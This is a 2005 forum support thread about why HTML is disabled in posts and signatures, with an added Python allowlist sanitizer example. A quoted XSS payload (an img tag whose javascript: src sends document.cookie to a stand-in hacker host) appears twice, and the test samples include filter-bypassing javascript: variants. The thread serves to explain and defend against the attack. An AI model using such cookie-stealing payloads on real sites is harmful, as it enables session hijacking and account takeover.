Is there a way to enable html code in Posts and Signatures?
No... and if you like your administrator account's current password, you'll probably want to keep it that way.
-[Unknown]
Although there is a safe html option in Edit Features and Options, but the tags are limited for the reasons [Unknown] pointed out.
Quote from: [Unknown] on March 14, 2005, 07:18:39 PM
No... and if you like your administrator account's current password, you'll probably want to keep it that way.
-[Unknown]
What happens when you use HTML code?
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?' + document.cookie;" />
-[Unknown]
Ohh, I understand now. It's easier to hack your site.
I very much understand disallowing java and applets, but I fail to see how the vast majority of html tags pose any threat. Pretty much all boards have liberal html functions built in, obviously sans things like java and applets.
This is the only disappointment I've had with this package so far, as have my members.
At least a package for trusted members would be appropriate. Many of my members have been html authors for about a century now. ;)
You can turn on and off basic HTML which allows images and links or as I call them Here Refs and Img Sarks.
Admin > Features and Options,
though I think it's not a good idea to turn it on.
Why not?
:D I *did* have it on - but it's so limited that nobody noticed! ;D
Quote from: [Unknown] on March 15, 2005, 03:51:10 AM
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?' + document.cookie;" />
-[Unknown]
Why can't SMF just str_replace("javascript:", "noJavaScriptAllowed...Punk:", $HTMLtext) ? :P
Because that would be easy to get round.
Quote from: Spamiam on June 17, 2005, 07:37:22 PM
:D I *did* have it on - but it's so limited that nobody noticed! ;D
I made a mod (More HTML Tags) that expands the tag list, but it's still limited to tags without attributes. It includes things like list, header, abbreviation, center, etc. More complicated tags will result in an easier security breach, which is a focus of 1.0.5... You need to compromise some of the time.
Quote from: Ben_S on June 30, 2005, 01:27:27 PM
Because that would be easy to get round.
How? As far as I know, you can't run any javascript without the word "javascript:" in an href or src. You could also disable use of the <script> tag.
Because IE will try to parse completely invalid HTML. It goes *out of its way* to try to make things that aren't otherwise insecure insecure.
For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved. Firefox was completely unaffected.
It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.
-[Unknown]
Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML. It goes *out of its way* to try to make things that aren't otherwise insecure insecure.
For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved. Firefox was completely unaffected.
It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.
-[Unknown]
Wow.
On a side note, is there a way to disallow Flash in signatures?
Just in signatures?
.signature embed, .signature object
{
display: none;
}
-[Unknown]
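Two points in this thread are worth seeing in running code: why the str_replace("javascript:", ...) shortcut proposed above is easy to get round, and why stripping object/embed from signatures server-side is a stronger control than hiding them with CSS (display: none only changes rendering; the markup still reaches every visitor's browser). The example below is added here and is not SMF's code; it is written in Python rather than PHP so it runs stand-alone, and the tag and attribute allowlist, the naive_filter and sanitize functions, and the sample inputs are all assumptions constructed for illustration. It contrasts the blacklist replacement with an allowlist sanitizer that keeps only known-safe tags and attributes and checks the URL scheme of href/src after the same normalisation a lenient browser applies (entity decoding, embedded whitespace removed), so a case change or an entity-encoded scheme does not slip through.

```python
import html
import re
from html.parser import HTMLParser
from typing import List, Optional

# The blacklist approach suggested in the thread: replace the literal string
# "javascript:" and hope nothing else gets through.
def naive_filter(text: str) -> str:
    return text.replace("javascript:", "noJavaScriptAllowed...Punk:")

# Assumed allowlist of tags and attributes a "basic HTML" post may keep.
# Any other tag (script, object, embed, style, ...) is dropped as a tag,
# but its text content survives, escaped.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https"}

_CTRL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")

def safe_url(value: str) -> Optional[str]:
    """Return a cleaned URL if it is relative or http(s), otherwise None.

    Entities are decoded and embedded whitespace/control characters removed
    before the scheme is inspected, because lenient browsers do the same:
    "jav<TAB>ascript:" and "&#106;avascript:" both end up meaning javascript:.
    Decoding is applied even though HTMLParser already decoded the attribute
    once; rejecting a doubly-encoded scheme is deliberately conservative.
    Any scheme other than http/https (javascript, vbscript, data, ...) is refused.
    """
    cleaned = _CTRL_OR_SPACE.sub("", html.unescape(value))
    m = _SCHEME.match(cleaned)
    if m and m.group(1).lower() not in SAFE_SCHEMES:
        return None
    return cleaned

class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.open_tags: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown or unsafe tag: dropped, inner text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # no style=, on*=, or other unlisted attributes
            value = value or ""
            if name in ("href", "src"):
                checked = safe_url(value)
                if checked is None:
                    continue  # unsafe URL: keep the tag, drop the attribute
                value = checked
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return  # stray close tag or close of a dropped tag
        while self.open_tags:  # close intervening tags so nesting stays balanced
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.open_tags:  # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)

def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()

if __name__ == "__main__":
    # Constructed sample post/signature fragments for illustration.
    samples = [
        '<img src="JavaScript:alert(document.cookie)" />',
        '<a href="jav\tascript:alert(1)">click</a>',
        '<b>bold</b><script>alert(1)</script>',
        '<object data="x.swf"><embed src="x.swf"></object>signature text',
        '<a href="http://www.example.com/">example</a>',
    ]
    for s in samples:
        print("naive    :", naive_filter(s))
        print("allowlist:", sanitize(s))
```

The naive filter leaves the first two samples untouched because neither contains the exact lowercase string it looks for, while the allowlist keeps the img and a tags but discards their unsafe src/href; the object and embed in the signature sample disappear entirely, which is the server-side counterpart of the CSS rule above. The allowlist is the part that needs maintenance: every tag or attribute added to it (as the More HTML Tags mod does) has to be checked for what a browser will do with it.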
Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML. It goes *out of its way* to try to make things that aren't otherwise insecure insecure.
Yikes. :o It must be because back when IE 4/5 was being developed, they wanted a browser that would try to recover from HTML tag errors as opposed to rejecting them completely and barfing up a page (or crashing :P). As a result, you get IE trying to parse anything, leading to obvious security holes. :-\
Anyway, personally I don't like using html in my forum and almost everything you could ever want to do visually is already possible using BBC tags. :)
Quote from: [Unknown] on June 30, 2005, 09:09:19 PM
Just in signatures?
.signature embed, .signature object
{
display: none;
}
-[Unknown]
Excellent! Thanks!